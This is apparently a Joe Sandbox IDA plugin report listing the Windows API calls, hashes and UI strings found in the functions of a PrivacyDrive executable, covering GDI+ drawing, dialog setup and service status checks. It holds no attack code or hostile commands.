                                • Instruction ID: 92e805b7985315f1fa8a27059a547264e3897f5ee9ff3543a7cff48fe8435982
                                • Opcode Fuzzy Hash: b38e0aca2129a68135e6c9f3b7786b7596dbd0a197b37821394c374c46dc5b0a
                                • Instruction Fuzzy Hash: 4D615EB1900208ABEB10DF94CD557EFBBB5FF14318F144529E801B7391D77AAA48CBA5
                                APIs
                                • GdipCreateStringFormat.GDIPLUS(00000000,00000000,000000D8), ref: 004EC3D8
                                • GdipSetStringFormatTabStops.GDIPLUS(000000D8,?,00000003,00000130), ref: 004EC4D0
                                • GdipSetStringFormatTrimming.GDIPLUS(000000D8,00000001,?,00000003,00000130), ref: 004EC4E1
                                • GdipSetStringFormatFlags.GDIPLUS(000000D8,00000800,?,00000003,00000130), ref: 004EC4F5
                                • GetDC.USER32(00000000), ref: 004EC61C
                                • GdipAlloc.GDIPLUS(00000008,?,00000003,00000130), ref: 004EC62A
                                • GdipCreateFromHDC.GDIPLUS(?,?,?,00000003,00000130), ref: 004EC64E
                                • GdipSetTextRenderingHint.GDIPLUS(00000000,00000005,?,00000003,00000130), ref: 004EC66E
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.2151000418.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000004.00000002.2150978302.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151132618.0000000000552000.00000002.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151182878.00000000005AC000.00000004.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151210226.00000000005AD000.00000008.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151306605.00000000005BA000.00000004.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151306605.00000000005C0000.00000004.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151352259.00000000005C1000.00000002.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151352259.00000000005CB000.00000002.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151352259.0000000000601000.00000002.00000001.01000000.00000006.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_PrivacyDrive.jbxd
                                Similarity
                                • API ID: Gdip$FormatString$Create$AllocFlagsFromHintRenderingStopsTextTrimming
                                • String ID: < DxSEdit >
                                • API String ID: 3797223327-2588429245
                                • Opcode ID: 6d9013437e44260c65e330b9970983054c444e9d8ceaa8df436844f00a91d111
                                • Instruction ID: e8f1680d67db8f29540a1298256c817737279cadc3365bd7b0a6e481383b9cf8
                                • Opcode Fuzzy Hash: 6d9013437e44260c65e330b9970983054c444e9d8ceaa8df436844f00a91d111
                                • Instruction Fuzzy Hash: 5E91E0B0601B46EFE718CF24C9697DAFFA4FB05308F108619D4689B280D7BA6568DFD4
                                APIs
                                  • Part of subcall function 004D44A0: VirtualAlloc.KERNEL32(00000000,00000014,00001000,00000040,?,004A0394,7563D392), ref: 004D44B4
                                  • Part of subcall function 004D44A0: GetCurrentProcess.KERNEL32(?,00000014), ref: 004D4512
                                  • Part of subcall function 004D44A0: FlushInstructionCache.KERNEL32(00000000), ref: 004D4519
                                  • Part of subcall function 00417CF0: EnterCriticalSection.KERNEL32(005BDCE4,?,?,004B0DAD,0041820C,7563D392,?,?), ref: 00417D00
                                  • Part of subcall function 00417CF0: LeaveCriticalSection.KERNEL32(005BDCE4,?,?), ref: 00417D18
                                  • Part of subcall function 00417CF0: EnterCriticalSection.KERNEL32(005BDCE4,00000000,Dialog,?,SPLASH,?,?), ref: 00417D45
                                  • Part of subcall function 00417CF0: LeaveCriticalSection.KERNEL32(005BDCE4,?,?), ref: 00417D57
                                  • Part of subcall function 00417CF0: EnterCriticalSection.KERNEL32(005BDCE4,00000000,Dialog,?,SPLASH,?,?), ref: 00417D84
                                  • Part of subcall function 00417CF0: LeaveCriticalSection.KERNEL32(005BDCE4,?,?), ref: 00417D96
                                • GetDesktopWindow.USER32 ref: 00418222
                                • IsWindowEnabled.USER32(004B0DAD), ref: 0041822D
                                • SendMessageW.USER32(004B0DAD,0000000A,00000000,00000000), ref: 0041823E
                                • EnableWindow.USER32(004B0DAD,00000000), ref: 00418247
                                • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 0041828A
                                • SetWindowPos.USER32(00000000,?,?), ref: 0041834F
                                • SendMessageW.USER32(004B0DAD,0000000A,00000001,00000000), ref: 00418365
                                • EnableWindow.USER32(004B0DAD,00000001), ref: 0041836E
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.2151000418.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000004.00000002.2150978302.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151132618.0000000000552000.00000002.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151182878.00000000005AC000.00000004.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151210226.00000000005AD000.00000008.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151306605.00000000005BA000.00000004.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151306605.00000000005C0000.00000004.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151352259.00000000005C1000.00000002.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151352259.00000000005CB000.00000002.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151352259.0000000000601000.00000002.00000001.01000000.00000006.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_PrivacyDrive.jbxd
                                Similarity
                                • API ID: CriticalSection$Window$EnterLeave$EnableMessageSend$AllocCacheCurrentDesktopEnabledFlushInfoInstructionParametersProcessSystemVirtual
                                • String ID: cbfx_SplashWnd
                                • API String ID: 1587869636-1958384472
                                • Opcode ID: 99b6264c33b8edd2d07a385b3ea17fa264ebd3c6cf1608d8771d251598003c9b
                                • Instruction ID: 3cf59c8892adc52d45e67691539f7b64612a81ef1155bc98daa200ef4ba26f56
                                • Opcode Fuzzy Hash: 99b6264c33b8edd2d07a385b3ea17fa264ebd3c6cf1608d8771d251598003c9b
                                • Instruction Fuzzy Hash: 2A515A71A00314AFEB10CF64CC55FAAB7B4FF49704F14469AFA09A72D0DBB5A944CB94
                                APIs
                                • OpenSCManagerW.ADVAPI32(00000000,00000000,000F003F,?,?,?,?,0041041F,?,00000000), ref: 0041D5DF
                                • OpenServiceW.ADVAPI32(00000000,PrivacyDrive,000F01FF,?,?,?,0041041F,?,00000000), ref: 0041D5FB
                                • CloseServiceHandle.ADVAPI32(0041041F,?,?,?,0041041F,?,00000000), ref: 0041D623
                                • OpenServiceW.ADVAPI32(00000000,PDSvc,000F01FF,?,?,?,0041041F,?,00000000), ref: 0041D635
                                • CloseServiceHandle.ADVAPI32(0041041F,?,?,?,0041041F,?,00000000), ref: 0041D657
                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,0041041F,?,00000000), ref: 0041D65A
                                  • Part of subcall function 0041CDA0: QueryServiceStatus.ADVAPI32(00000000,?,00000000,?,?,?,0041D649), ref: 0041CDCC
                                  • Part of subcall function 0041CDA0: QueryServiceStatus.ADVAPI32(00000000,?,00000000,75A90460,?,?,?,0041D649), ref: 0041CDE9
                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,0041041F,?,00000000), ref: 0041D669
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.2151000418.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000004.00000002.2150978302.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151132618.0000000000552000.00000002.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151182878.00000000005AC000.00000004.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151210226.00000000005AD000.00000008.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151306605.00000000005BA000.00000004.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151306605.00000000005C0000.00000004.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151352259.00000000005C1000.00000002.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151352259.00000000005CB000.00000002.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151352259.0000000000601000.00000002.00000001.01000000.00000006.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_PrivacyDrive.jbxd
                                Similarity
                                • API ID: Service$CloseHandle$Open$QueryStatus$Manager
                                • String ID: PDSvc$PrivacyDrive
                                • API String ID: 3801983163-1250294606
                                • Opcode ID: ee8ba61a779bb7c552862b1ce06a56b1350a7c212425bb75d4c7fdf4fe3d6882
                                • Instruction ID: f5ad83e4ce3b08594db57bd147820be98746d85e02aa9721d6382146c0f6d350
                                • Opcode Fuzzy Hash: ee8ba61a779bb7c552862b1ce06a56b1350a7c212425bb75d4c7fdf4fe3d6882
                                • Instruction Fuzzy Hash: 0F11E932B42215679A105B786C499BEBBA8DB82775B100366FD1CE32D0DE69DC00E294
                                APIs
                                • LoadLibraryW.KERNEL32(Dwmapi.dll,004013E5), ref: 004EF0FA
                                • GetProcAddress.KERNEL32(00000000,DwmEnableComposition), ref: 004EF116
                                • GetProcAddress.KERNEL32(DwmExtendFrameIntoClientArea), ref: 004EF128
                                • GetProcAddress.KERNEL32(DwmSetWindowAttribute), ref: 004EF13A
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.2151000418.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000004.00000002.2150978302.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151132618.0000000000552000.00000002.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151182878.00000000005AC000.00000004.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151210226.00000000005AD000.00000008.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151306605.00000000005BA000.00000004.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151306605.00000000005C0000.00000004.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151352259.00000000005C1000.00000002.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151352259.00000000005CB000.00000002.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151352259.0000000000601000.00000002.00000001.01000000.00000006.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_PrivacyDrive.jbxd
                                Similarity
                                • API ID: AddressProc$LibraryLoad
                                • String ID: @[$DwmEnableComposition$DwmExtendFrameIntoClientArea$DwmSetWindowAttribute$Dwmapi.dll
                                • API String ID: 2238633743-2065916801
                                • Opcode ID: 20efdd21f22bce50ed8309cc7d8d424ddc0757134462b64042f10ba2789c9e79
                                • Instruction ID: 758a266aad549dc443860feb06a9b5d9908e91e524c95404062e84539075d43a
                                • Opcode Fuzzy Hash: 20efdd21f22bce50ed8309cc7d8d424ddc0757134462b64042f10ba2789c9e79
                                • Instruction Fuzzy Hash: 34F01C74E41355AADF506F36AC1A4853FF8B72970035C0B27A804B3260FBB4A448EF57
                                APIs
                                • GetWindowRect.USER32(00000000), ref: 004313A4
                                  • Part of subcall function 004CB410: GdipSetSmoothingMode.GDIPLUS(?,00000003,?,lB,0056CE40,?,?,?,?,0042E96C,?,?), ref: 004CB477
                                • __CxxThrowException@8.LIBCMT ref: 004313F8
                                  • Part of subcall function 00502BEB: RaiseException.KERNEL32(?,?,7563D392,005A7F20,?,?,?,?,?,004FFD4E,7563D392,005A7F20,?,00000001), ref: 00502C40
                                • QueryPerformanceFrequency.KERNEL32(?,0053E548,000000FF), ref: 0043140B
                                • QueryPerformanceCounter.KERNEL32(?), ref: 00431439
                                • QueryPerformanceCounter.KERNEL32(?), ref: 0043143F
                                • GetDC.USER32 ref: 0043150C
                                • UpdateLayeredWindow.USER32(?,00000000,?,?,?,00000000,00000000,00000000,00000002), ref: 00431535
                                • ReleaseDC.USER32(00000000,00000000), ref: 0043153E
                                • Sleep.KERNEL32(0000000A), ref: 00431546
                                • QueryPerformanceCounter.KERNEL32(?), ref: 00431550
                                Memory Dump Source
                                • Source File: 00000004.00000002.2151000418.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000004.00000002.2150978302.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151132618.0000000000552000.00000002.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151182878.00000000005AC000.00000004.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151210226.00000000005AD000.00000008.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151306605.00000000005BA000.00000004.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151306605.00000000005C0000.00000004.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151352259.00000000005C1000.00000002.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151352259.00000000005CB000.00000002.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151352259.0000000000601000.00000002.00000001.01000000.00000006.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_PrivacyDrive.jbxd
                                Similarity
                                • API ID: PerformanceQuery$Counter$Window$ExceptionException@8FrequencyGdipLayeredModeRaiseRectReleaseSleepSmoothingThrowUpdate
                                • String ID:
                                • API String ID: 647198111-0
                                • Opcode ID: 96f2cfd042a5900a28ded7a8662c8d404411b6d86c7475caafb7818d653a449f
                                • Instruction ID: fea068c4364ea2304a375a6ee7bc06aea74c7dd64ec75d3df016ab5795cc0e07
                                • Opcode Fuzzy Hash: 96f2cfd042a5900a28ded7a8662c8d404411b6d86c7475caafb7818d653a449f
                                • Instruction Fuzzy Hash: 2F91237590020D9FDB11DFA8D858BEEBBB9FF48300F10422AE915B7261DB35A949CF50
                                APIs
                                • GetDC.USER32(00000000), ref: 0041E2E0
                                • GdipCreateFromHDC.GDIPLUS(00000000,?), ref: 0041E2FE
                                • GdipCreateStringFormat.GDIPLUS(00000000,00000000,?), ref: 0041E32D
                                • GdipMeasureString.GDIPLUS(?,?,000000FF,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0041E3C1
                                • GdipMeasureString.GDIPLUS(00000000,?,000000FF,00000000,00000000,00000000,00000000,?,?), ref: 0041E436
                                • GdipGetFontHeightGivenDPI.GDIPLUS(?,?,00000000), ref: 0041E4BF
                                • GdipGetFontHeightGivenDPI.GDIPLUS(?,?,00000000), ref: 0041E4F9
                                • ReleaseDC.USER32(00000000,00000000), ref: 0041E529
                                • GdipDeleteStringFormat.GDIPLUS(?,?,00000000), ref: 0041E538
                                • GdipDeleteGraphics.GDIPLUS(?,?,00000000), ref: 0041E54A
                                Memory Dump Source
                                • Source File: 00000004.00000002.2151000418.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000004.00000002.2150978302.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151132618.0000000000552000.00000002.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151182878.00000000005AC000.00000004.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151210226.00000000005AD000.00000008.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151306605.00000000005BA000.00000004.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151306605.00000000005C0000.00000004.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151352259.00000000005C1000.00000002.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151352259.00000000005CB000.00000002.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151352259.0000000000601000.00000002.00000001.01000000.00000006.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_PrivacyDrive.jbxd
                                Similarity
                                • API ID: Gdip$String$CreateDeleteFontFormatGivenHeightMeasure$FromGraphicsRelease
                                • String ID:
                                • API String ID: 2359815219-0
                                • Opcode ID: 585e7a93bd58001904740ac3a91bdceba3dfd91d643e846050f90aceca192211
                                • Instruction ID: 09d8ae3e237c4575dbacd8db9b975f17c591a55f032f9cd3dc16601ab6b94f48
                                • Opcode Fuzzy Hash: 585e7a93bd58001904740ac3a91bdceba3dfd91d643e846050f90aceca192211
                                • Instruction Fuzzy Hash: B88166B1508301EFD311CF25C844B5ABBE4FF99714F104B1DF995A62A0E771A888DF92
                                APIs
                                • GdipCreateStringFormat.GDIPLUS ref: 00419802
                                • GdipSetStringFormatAlign.GDIPLUS(?,00000000), ref: 0041981D
                                • GdipSetStringFormatLineAlign.GDIPLUS(?,00000000), ref: 00419836
                                • GdipSetStringFormatTrimming.GDIPLUS(?,00000004), ref: 0041984F
                                • GdipSetStringFormatFlags.GDIPLUS(?,00001000), ref: 0041986B
                                • GdipMeasureString.GDIPLUS(?,?,000000FF,00000000,?,00000000,?,?,00000000), ref: 004198AE
                                • GdipCreateSolidFill.GDIPLUS(FF414141,7563D392,?,000000FF,00000000,?,00000000,?,?,00000000), ref: 004198ED
                                • GdipDrawString.GDIPLUS(?,?,000000FF,00000000,00000000,?,7563D392,?,000000FF,00000000,?,00000000,?,?,00000000), ref: 00419970
                                • GdipDeleteBrush.GDIPLUS(7563D392,?,?,?,?,00000000,?,?,000000FF,00000000,?,00000000,?,?,00000000), ref: 004199D1
                                • GdipDeleteStringFormat.GDIPLUS(?,?,?,?,?,00000000,?,?,000000FF,00000000,?,00000000,?,?,00000000), ref: 004199E6
                                Similarity
                                • API ID: Gdip$String$Format$AlignCreateDelete$BrushDrawFillFlagsLineMeasureSolidTrimming
                                • String ID:
                                • API String ID: 3860206108-0
                                • Opcode ID: 72c8353d38246cf214f3c896df47ffc54ca75d197caa8221dc247120b4e1eade
                                • Instruction ID: 82aa97e7e2b9b2b851f263c426e3dbaf2b95d9476accf6596981ef5f21f49aac
                                • Opcode Fuzzy Hash: 72c8353d38246cf214f3c896df47ffc54ca75d197caa8221dc247120b4e1eade
                                • Instruction Fuzzy Hash: 2B7164B1618341AFE315CF25C894B1BBBF4FF99354F104A1DF895A22A0E770E888DB52
                                APIs
                                • GetDC.USER32(00000000), ref: 004A3818
                                • GdipCreateFromHDC.GDIPLUS(00000000,00549710,?,?,?,?,?,?,?,?,?,?,?,?,-00000064), ref: 004A3837
                                • GdipCreateStringFormat.GDIPLUS(00000000), ref: 004A389F
                                • SystemParametersInfoW.USER32(00000030,00000000,-00000064,00000000), ref: 004A38C4
                                • GdipSetTextRenderingHint.GDIPLUS(000000FF,00000005), ref: 004A38ED
                                • GdipSetStringFormatTrimming.GDIPLUS(00000000,00000000), ref: 004A3900
                                • GdipMeasureString.GDIPLUS(000000FF,?,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 004A394A
                                • ReleaseDC.USER32(00000000,-00000064), ref: 004A3988
                                • GdipDeleteStringFormat.GDIPLUS(00000000), ref: 004A3995
                                • GdipDeleteGraphics.GDIPLUS(000000FF), ref: 004A39A5
                                Similarity
                                • API ID: Gdip$String$Format$CreateDelete$FromGraphicsHintInfoMeasureParametersReleaseRenderingSystemTextTrimming
                                • String ID:
                                • API String ID: 1209069038-0
                                • Opcode ID: e13e9a6b74bf522df359b8afa5e44bdf5ab1eabf9894cdebf30e4b9570834280
                                • Instruction ID: 1d3a1b7f377fb260887c64f343e449651bc82d9dc617161939b0125236653fd0
                                • Opcode Fuzzy Hash: e13e9a6b74bf522df359b8afa5e44bdf5ab1eabf9894cdebf30e4b9570834280
                                • Instruction Fuzzy Hash: 3851F272A00308EFDB10CFA8D858B9EBBB4FF59715F104219E805BB290E7B56949DB50
                                APIs
                                  • Part of subcall function 00470FB0: EnterCriticalSection.KERNEL32(005BDCE4,?,00000000,00000000,00471119,7563D392,?,?,00000000,?,?,?,?,00545070,000000FF), ref: 00470FC0
                                  • Part of subcall function 00470FB0: LeaveCriticalSection.KERNEL32(005BDCE4,?,00000000,00000000,00471119,7563D392,?,?,00000000,?,?,?,?,00545070,000000FF), ref: 00470FD8
                                  • Part of subcall function 00470FB0: EnterCriticalSection.KERNEL32(005BDCE4,00000000,Button,00000138,HYPERLINK,?,00000000,00000000,00471119,7563D392,?,?,00000000), ref: 00471005
                                  • Part of subcall function 00470FB0: LeaveCriticalSection.KERNEL32(005BDCE4,?,00000000,00000000,00471119,7563D392,?,?,00000000,?,?,?,?,00545070,000000FF), ref: 00471017
                                  • Part of subcall function 00470FB0: EnterCriticalSection.KERNEL32(005BDCE4,00000000,Button,00000118,HYPERLINK,?,00000000,00000000,00471119,7563D392,?,?,00000000), ref: 00471044
                                  • Part of subcall function 00470FB0: LeaveCriticalSection.KERNEL32(005BDCE4,?,00000000,00000000,00471119,7563D392,?,?,00000000,?,?,?,?,00545070,000000FF), ref: 00471056
                                • GetDC.USER32(00000000), ref: 0047112C
                                • GdipCreateFromHDC.GDIPLUS(00000000,004265D4,?,?,00000000,?,?,?,?,00545070,000000FF), ref: 00471149
                                • GdipCreateStringFormat.GDIPLUS(00000000,00000000,00000000,?,?,00000000), ref: 00471193
                                • GdipSetTextRenderingHint.GDIPLUS(00000000,00000005,?,?,00000000), ref: 004711A3
                                • GdipMeasureString.GDIPLUS(00000000,00000000,000000FF,00000000,?,00000000,00000000,?,?,?,?,00000000), ref: 004711D8
                                • ReleaseDC.USER32(00000000,00000000), ref: 004711EB
                                • GdipDeleteStringFormat.GDIPLUS(00000000,00000001,?,?,?,00000000,00000000,00000001,00000001,00000001,?,?,00000000), ref: 00471250
                                • GdipDeleteGraphics.GDIPLUS(00000000,?,?,00000000), ref: 0047125E
                                • GdipDeleteStringFormat.GDIPLUS(00000000,00000001,?,?,?,00000000,00000000,00000001,00000001,00000001,?,?,00000000), ref: 00471284
                                • GdipDeleteGraphics.GDIPLUS(00000000,?,?,00000000), ref: 00471292
                                Similarity
                                • API ID: Gdip$CriticalSection$DeleteString$EnterFormatLeave$CreateGraphics$FromHintMeasureReleaseRenderingText
                                • String ID:
                                • API String ID: 1338920557-0
                                • Opcode ID: d95156ea57c9d7808e110d15ca985729e7fac2c7c35a35337629e3649b75d5a8
                                • Instruction ID: 4db55db421839a4f1f7ea1671b78e7f67187b6ba5581c9a9af02339a1d8ca7ab
                                • Opcode Fuzzy Hash: d95156ea57c9d7808e110d15ca985729e7fac2c7c35a35337629e3649b75d5a8
                                • Instruction Fuzzy Hash: 77517A71A00209EFDB11CFA8DC59BEEBBB4FB19314F10821AF915B62A0E7759904DB60
                                APIs
                                • EnterCriticalSection.KERNEL32(005BDCE4,?,?,?,0041A57C), ref: 0041A680
                                • LeaveCriticalSection.KERNEL32(005BDCE4,?,?,?,0041A57C), ref: 0041A698
                                • EnterCriticalSection.KERNEL32(005BDCE4,00000000,TitleBar,?,DRIVE_LIST,?,?,?,0041A57C), ref: 0041A6C5
                                • LeaveCriticalSection.KERNEL32(005BDCE4,?,?,?,0041A57C), ref: 0041A6D7
                                  • Part of subcall function 004C24A0: WideCharToMultiByte.KERNEL32(00000003,00000000,?,000000FF,?, v,00000000,00000000,00000000,?,00000000,?,00000003,?,00583B28,00000000), ref: 004C2699
                                • EnterCriticalSection.KERNEL32(005BDCE4,00000000,TitleBar,?,DRIVE_LIST,?,?,?,0041A57C), ref: 0041A704
                                • LeaveCriticalSection.KERNEL32(005BDCE4,?,?,?,0041A57C), ref: 0041A716
                                Strings
                                Similarity
                                • API ID: CriticalSection$EnterLeave$ByteCharMultiWide
                                • String ID: CR_BACKGROUND_BEGIN$CR_BACKGROUND_END$DRIVE_LIST$TitleBar
                                • API String ID: 904232820-887086326
                                • Opcode ID: fb6bee19645a3d5686921632b893275be9081d7dd99eb4585fd1bc1993618d7e
                                • Instruction ID: 79ea068261a043cbfaa6fc1e4640479fbfa165a81fd4abad349106ecbc512596
                                • Opcode Fuzzy Hash: fb6bee19645a3d5686921632b893275be9081d7dd99eb4585fd1bc1993618d7e
                                • Instruction Fuzzy Hash: B0216074382302ABD664A775DD82FE77BA4BF10745F04042EBA59D31C0FAA4F845C726
                                APIs
                                • EnterCriticalSection.KERNEL32(005BDCE4,00000000,?,?,00450438,7563D392,?,?,?,?,00541940,000000FF,?,004B03AA), ref: 00450140
                                • LeaveCriticalSection.KERNEL32(005BDCE4,?,?,?,?,00541940,000000FF,?,004B03AA), ref: 00450158
                                • EnterCriticalSection.KERNEL32(005BDCE4,00000000,Dialog,?,REGISTER,?,?,?,?,00541940,000000FF,?,004B03AA), ref: 00450185
                                • LeaveCriticalSection.KERNEL32(005BDCE4,?,?,?,?,00541940,000000FF,?,004B03AA), ref: 00450197
                                  • Part of subcall function 004C24A0: WideCharToMultiByte.KERNEL32(00000003,00000000,?,000000FF,?, v,00000000,00000000,00000000,?,00000000,?,00000003,?,00583B28,00000000), ref: 004C2699
                                • EnterCriticalSection.KERNEL32(005BDCE4,00000000,Dialog,?,REGISTER,?,?,?,?,00541940,000000FF,?,004B03AA), ref: 004501C0
                                • LeaveCriticalSection.KERNEL32(005BDCE4,?,?,?,?,00541940,000000FF,?,004B03AA), ref: 004501D2
                                Strings
                                Similarity
                                • API ID: CriticalSection$EnterLeave$ByteCharMultiWide
                                • String ID: Dialog$PM_HEIGHT$PM_WIDTH$REGISTER
                                • API String ID: 904232820-2885144559
                                • Opcode ID: 1232f653f064cc69b446d0000a521427d6d026b350b09f417f6c11c5db8e2fc4
                                • Instruction ID: 1795d43d4a07bf36addd6cc27d5771d0a641f7eb05ceb74cf415dbd9cb5915ab
                                • Opcode Fuzzy Hash: 1232f653f064cc69b446d0000a521427d6d026b350b09f417f6c11c5db8e2fc4
                                • Instruction Fuzzy Hash: 8D216274385706ABD610E7B69C96FA66BE8FB54706F04042EB649D32C1EEE4F804DB24
                                APIs
                                • EnterCriticalSection.KERNEL32(005BDCE4,?,?,?,004026D0,7563D392), ref: 00415550
                                • LeaveCriticalSection.KERNEL32(005BDCE4,?,?,?,004026D0,7563D392), ref: 00415568
                                • EnterCriticalSection.KERNEL32(005BDCE4,00000000,Dialog,?,PASSWORD,?,?,?,004026D0,7563D392), ref: 00415595
                                • LeaveCriticalSection.KERNEL32(005BDCE4,?,?,?,004026D0,7563D392), ref: 004155A7
                                  • Part of subcall function 004C24A0: WideCharToMultiByte.KERNEL32(00000003,00000000,?,000000FF,?, v,00000000,00000000,00000000,?,00000000,?,00000003,?,00583B28,00000000), ref: 004C2699
                                • EnterCriticalSection.KERNEL32(005BDCE4,00000000,Dialog,?,PASSWORD,?,?,?,004026D0,7563D392), ref: 004155D0
                                • LeaveCriticalSection.KERNEL32(005BDCE4,?,?,?,004026D0,7563D392), ref: 004155E2
                                Strings
                                Similarity
                                • API ID: CriticalSection$EnterLeave$ByteCharMultiWide
                                • String ID: Dialog$PASSWORD$PM_HEIGHT$PM_WIDTH
                                • API String ID: 904232820-3657400423
                                • Opcode ID: 3925b9ec2e7c7eb30c46bdd1711993fd484669aaaedef7c9b298f213384a2b00
                                • Instruction ID: 89e29c91ffdbc22f58892ef3380fc42036552decf4919217867b5359a2a5851f
                                • Opcode Fuzzy Hash: 3925b9ec2e7c7eb30c46bdd1711993fd484669aaaedef7c9b298f213384a2b00
                                • Instruction Fuzzy Hash: 27218470384706ABDA10E7768E96FE2ABE4BB50706F40042AB64DD32D0EEF4F805C765
                                APIs
                                • EnterCriticalSection.KERNEL32(005BDCE4), ref: 00406610
                                • LeaveCriticalSection.KERNEL32(005BDCE4), ref: 00406628
                                • EnterCriticalSection.KERNEL32(005BDCE4,00000000,Dialog,?,CHANGE_KEY_FILE), ref: 00406655
                                • LeaveCriticalSection.KERNEL32(005BDCE4), ref: 00406667
                                  • Part of subcall function 004C24A0: WideCharToMultiByte.KERNEL32(00000003,00000000,?,000000FF,?, v,00000000,00000000,00000000,?,00000000,?,00000003,?,00583B28,00000000), ref: 004C2699
                                • EnterCriticalSection.KERNEL32(005BDCE4,00000000,Dialog,?,CHANGE_KEY_FILE), ref: 00406690
                                • LeaveCriticalSection.KERNEL32(005BDCE4), ref: 004066A2
                                Strings
                                Similarity
                                • API ID: CriticalSection$EnterLeave$ByteCharMultiWide
                                • String ID: CHANGE_KEY_FILE$Dialog$PM_HEIGHT$PM_WIDTH
                                • API String ID: 904232820-3629064023
                                • Opcode ID: 0434f81e81c725c262128711de64b71d0b08566e8f60fb831b876a1d675a260b
                                • Instruction ID: b3a5dc42ddd407f53cb05a4efa2dc0af8bb578841b7104e5456df8250465188e
                                • Opcode Fuzzy Hash: 0434f81e81c725c262128711de64b71d0b08566e8f60fb831b876a1d675a260b
                                • Instruction Fuzzy Hash: 152150703847026BDA50E776CD96FA26BE8BB00B46F04043EB689D32D1EEE4B800C725
                                APIs
                                • EnterCriticalSection.KERNEL32(005BDCE4,?,?,?,00452C3D,?,?,?,?,004AE6B7,7563D392), ref: 00452AD0
                                • LeaveCriticalSection.KERNEL32(005BDCE4,?,00452C3D,?,?,?,?,004AE6B7,7563D392), ref: 00452AE8
                                • EnterCriticalSection.KERNEL32(005BDCE4,00000000,Dialog,?,SETTINGS,?,00452C3D,?,?,?,?,004AE6B7,7563D392), ref: 00452B15
